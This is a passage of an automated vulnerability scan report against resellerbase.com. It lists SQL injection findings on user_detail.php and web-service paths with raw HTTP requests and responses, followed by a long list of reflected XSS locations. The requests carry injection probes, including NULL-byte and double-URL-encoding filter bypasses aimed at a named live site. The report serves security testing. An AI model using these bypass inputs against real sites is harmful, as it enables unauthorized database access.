Date: Thu, 18 Nov 2010 01:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.15. http://www.resellerbase.com/user_detail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php%00'?u=permeapsecalk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php%00''?u=permeapsecalk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 46374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TOP 100 Reseller pro
...[SNIP]...

1.16. http://www.resellerbase.com/user_detail.php [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=pyncwaype HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.17. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php?u=tagerorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)%00'
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=tagerorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)%00''
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.18. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=roockydak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)'
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

Request 2

GET /user_detail.php?u=roockydak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)''
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.19. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /user_detail.php?u=purdue512&1%00'=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=purdue512&1%00''=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.20. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=rimi/1'nela HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

Request 2

GET /user_detail.php?u=rimi/1''nela HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

1.21. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

Request 1

GET /user_detail.php?u=rusdetectiv' HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

Request 2

GET /user_detail.php?u=rusdetectiv'' HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.22. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The u parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=thossenugmoms%2527 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=thossenugmoms%2527%2527 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.23. http://www.resellerbase.com/web-service/other/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

Request 1

GET /web-service'/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /web-service''/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 5635 instances of this issue:

/a [REST URL parameter 1]
/a [REST URL parameter 1]
/a [name of an arbitrarily supplied request parameter]
/a [select parameter]
/a/more2.html [REST URL parameter 1]
/a/more2.html [REST URL parameter 2]
/add.php [REST URL parameter 1]
/add.php [REST URL parameter 1]
/admin/ [REST URL parameter 1]
/admin/ [name of an arbitrarily supplied request parameter]
/adult/ [REST URL parameter 1]
/adult/ [REST URL parameter 1]
/adult/ [name of an arbitrarily supplied request parameter]
/adult/ [select parameter]
/adult/googlepr.php [REST URL parameter 1]
/adult/googlepr.php [REST URL parameter 2]
/adult/googlepr.php [link_id parameter]
/adult/googlepr.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/ [REST URL parameter 1]
/adult/media-chat/ [REST URL parameter 1]
/adult/media-chat/ [REST URL parameter 2]
/adult/media-chat/ [REST URL parameter 2]
/adult/media-chat/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/ [select parameter]
/adult/media-chat/googlepr.php [REST URL parameter 1]
/adult/media-chat/googlepr.php [REST URL parameter 2]
/adult/media-chat/googlepr.php [REST URL parameter 3]
/adult/media-chat/googlepr.php [link_id parameter]
/adult/media-chat/googlepr.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/more2.html [REST URL parameter 1]
/adult/media-chat/more2.html [REST URL parameter 1]
/adult/media-chat/more2.html [REST URL parameter 2]
/adult/media-chat/more2.html [REST URL parameter 2]
/adult/media-chat/more2.html [REST URL parameter 3]
/adult/media-chat/more2.html [REST URL parameter 3]
/adult/media-chat/search.php [REST URL parameter 1]
/adult/media-chat/search.php [REST URL parameter 1]
/adult/media-chat/search.php [REST URL parameter 2]
/adult/media-chat/search.php [REST URL parameter 2]
/adult/media-chat/search.php [REST URL parameter 3]
/adult/media-chat/search.php [REST URL parameter 3]
/adult/media-chat/search.php [Submit3 parameter]
/adult/media-chat/search.php [Submit3 parameter]
/adult/media-chat/search.php [cat parameter]
/adult/media-chat/search.php [cat parameter]
/adult/media-chat/search.php [keyword parameter]
/adult/media-chat/search.php [keyword parameter]
/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/search.php [opt parameter]
/adult/media-chat/search.php [opt parameter]
/adult/media-chat/search.php [select parameter]
/adult/media-chat/search.php [select parameter]
/adult/media-chat/themes/ [REST URL parameter 1]
/adult/media-chat/themes/ [REST URL parameter 2]
/adult/media-chat/themes/ [REST URL parameter 3]
/adult/media-chat/themes/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/ [REST URL parameter 1]
/adult/media-chat/themes/kosmos/ [REST URL parameter 2]
/adult/media-chat/themes/kosmos/ [REST URL parameter 3]
/adult/media-chat/themes/kosmos/ [REST URL parameter 4]
/adult/media-chat/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/ [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/ [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/ [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/ [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/ [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/rating/search.php [Submit3 parameter]
/adult/media-chat/themes/kosmos/images/rating/search.php [keyword parameter]
/adult/media-chat/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/rating/search.php [opt parameter]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 7]
/adult/media-chat/themes/kosmos/images/review/search.php [Submit3 parameter]
/adult/media-chat/themes/kosmos/images/review/search.php [keyword parameter]
/adult/media-chat/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/review/search.php [opt parameter]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 1]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 2]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 3]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 4]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 5]
/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 6]
/adult/media-chat/themes/kosmos/images/search.php [Submit3 parameter]
/adult/media-chat/themes/kosmos/images/search.php [keyword parameter]
/adult/media-chat/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/images/search.php [opt parameter]
/adult/media-chat/themes/kosmos/search.php [REST URL parameter 1]
/adult/media-chat/themes/kosmos/search.php [REST URL parameter 2]
/adult/media-chat/themes/kosmos/search.php [REST URL parameter 3]
/adult/media-chat/themes/kosmos/search.php [REST URL parameter 4]
/adult/media-chat/themes/kosmos/search.php [REST URL parameter 5]
/adult/media-chat/themes/kosmos/search.php [Submit3 parameter]
/adult/media-chat/themes/kosmos/search.php [keyword parameter]
/adult/media-chat/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/kosmos/search.php [opt parameter]
/adult/media-chat/themes/search.php [REST URL parameter 1]
/adult/media-chat/themes/search.php [REST URL parameter 2]
/adult/media-chat/themes/search.php [REST URL parameter 3]
/adult/media-chat/themes/search.php [REST URL parameter 4]
/adult/media-chat/themes/search.php [Submit3 parameter]
/adult/media-chat/themes/search.php [keyword parameter]
/adult/media-chat/themes/search.php [name of an arbitrarily supplied request parameter]
/adult/media-chat/themes/search.php [opt parameter]
/adult/more2.html [REST URL parameter 1]
/adult/more2.html [REST URL parameter 1]
/adult/more2.html [REST URL parameter 2]
/adult/more2.html [REST URL parameter 2]
/adult/personals-dating/ [REST URL parameter 1]
/adult/personals-dating/ [REST URL parameter 1]
/adult/personals-dating/ [REST URL parameter 2]
/adult/personals-dating/ [REST URL parameter 2]
/adult/personals-dating/ [name of an arbitrarily supplied request parameter]
/adult/personals-dating/ [select parameter]
/adult/personals-dating/googlepr.php [REST URL parameter 1]
/adult/personals-dating/googlepr.php [REST URL parameter 2]
/adult/personals-dating/googlepr.php [REST URL parameter 3]
/adult/personals-dating/googlepr.php [link_id parameter]
/adult/personals-dating/googlepr.php [name of an arbitrarily supplied request parameter]
/adult/personals-dating/search.php [REST URL parameter 1]
/adult/personals-dating/search.php [REST URL parameter 2]
/adult/personals-dating/search.php [REST URL parameter 3]
/adult/personals-dating/search.php [Submit3 parameter]
/adult/personals-dating/search.php [cat parameter]
/adult/personals-dating/search.php [cat parameter]
/adult/personals-dating/search.php [keyword parameter]
/adult/personals-dating/search.php [name of an arbitrarily supplied request parameter]
/adult/personals-dating/search.php [opt parameter]
/adult/personals-dating/themes/ [REST URL parameter 1]
/adult/personals-dating/themes/ [REST URL parameter 2]
/adult/personals-dating/themes/ [REST URL parameter 3]
/adult/personals-dating/themes/ [name of an arbitrarily supplied request parameter]
/adult/personals-dating/themes/kosmos/ [REST URL parameter 1]
/adult/personals-dating/themes/kosmos/ [REST URL parameter 2]
/adult/personals-dating/themes/kosmos/ [REST URL parameter 3]
/adult/personals-dating/themes/kosmos/ [REST URL parameter 4]
/adult/personals-dating/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 1]
/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 2]
/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 3]
/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 4]
